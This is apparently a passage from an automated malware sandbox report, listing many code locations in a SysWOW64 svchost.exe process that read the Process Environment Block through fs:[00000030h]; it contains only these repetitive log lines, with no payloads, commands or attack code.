Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]	2_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]	2_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]	2_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]	2_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]	2_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]	2_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]	2_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]	2_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]	2_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]	2_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]	2_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]	2_2_0342C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]	2_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]	2_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]	2_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]	2_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]	2_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]	2_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]	2_2_034280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]	2_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]	2_2_03430750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]	2_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]	2_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]	2_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]	2_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]	2_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]	2_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]	2_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]	2_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]	2_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]	2_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]	2_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]	2_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]	2_2_03462674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]	2_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]	2_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]	2_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]	2_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]	2_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]	2_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]	2_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]	2_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]	2_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]	2_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]	2_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]	2_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]	2_2_034EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]	2_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]	2_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]	2_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]	2_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]	2_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]	2_2_034EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]	2_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]	2_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
